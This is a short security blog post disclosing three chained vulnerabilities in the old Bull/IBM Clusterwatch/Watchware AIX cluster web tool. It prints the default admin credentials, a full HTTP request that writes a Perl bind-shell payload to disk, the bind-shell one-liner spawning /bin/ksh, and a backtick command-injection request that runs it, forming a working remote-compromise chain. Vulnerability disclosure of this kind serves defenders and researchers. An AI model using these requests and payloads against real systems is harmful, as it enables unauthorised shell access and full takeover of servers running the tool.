Davy Douhine 2 min

Bull/IBM Clusterwatch/Watchware is a VERY VERY OLD tool used by sysadmins to manage their AIX clusters.

Image: Clusterwatch

Marble effect in the web banner and questionable font: it smells the 90s !

Tool is mainly a web app with CGIs (shell scripts and binaries) and we have found three vulnerabilities in it:

  1. Trivial admin credentials
  2. Authenticated user can write on the system file
  3. Authenticated user can inject OS commands

By combining these three vulnerabilities an attacker can fully compromise servers running Watchware.

We tried to contact Bull to report this more than one year ago without any success, but the devs are probably retired now so that doesn’t matter, let’s do some archeology alone.

Here are the details:

1. Trivial creds: smwadmin/bullsmw

2. Authenticated user can write on the file system

The tool allows you to list running processes on the cluster nodes and a page allows sysadmins to customize a few things including filters that are used in the process listing page.

These filters are written on disk (in proc_filter.txt file which has 755 permissions) so if you are able to put a shellcode in it and then call it, the shellcode will be executed !

Image: Clusterwatch write

Request to write the shellcode on disk:

http://host:9696/clw/cgi-bin/adm/bclw_updatefile.cgi?cluster=clustername&node=nodename&alarm=%0D%0Aswap_adapter%0D%0Anode_down%0D%0Anode_up%0D%0Anetwork_down%0D%0Anetwork_up%0D%0Astate%0D%0Ahacmp%0D%0Astop%0D%0Aaix%0D%0A&day=1%0D%0A2%0D%0A3%0D%0A4%0D%0A5%0D%0A6%0D%0A7%0D%0A8%0D%0A15%0D%0A30%0D%0A45%0D%0A0%0D%0A&hour=0%0D%0A1%0D%0A2%0D%0A3%0D%0A4%0D%0A5%0D%0A6%0D%0A12%0D%0A18%0D%0A23%0D%0A&proc=perl%20-e%20'use%20Socket;$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p,%20INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close%20C){open(STDIN,">%26C");open(STDOUT,">%26C");open(STDERR,">%26C");exec("/bin/ksh%20-i");};'%0D%0A%0D%0A&lpp=%0D%0Acluster%0D%0A&refr=0%0D%0A

The shellcode we used:

perl -e 'use Socket;$p=2223;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/ksh -i");};'

3. Authenticated user can inject OS commands

When listing the processes you can apply a filter… and inject a single command using backticks, great !

Very useful to execute our shellcode which was stored in proc_filter.txt

Image: Clusterwatch execute

Request to execute the shellcode:

http://host:9696/clw/cgi-bin/adm/bclw_stproc.cgi?cluster=clustername&node=nodename&proc_filter=smw`/usr/sbin/bullcluster/monitoring/clw/web/conf/proc_filter.txt`"

And now it’s on Exploit-DB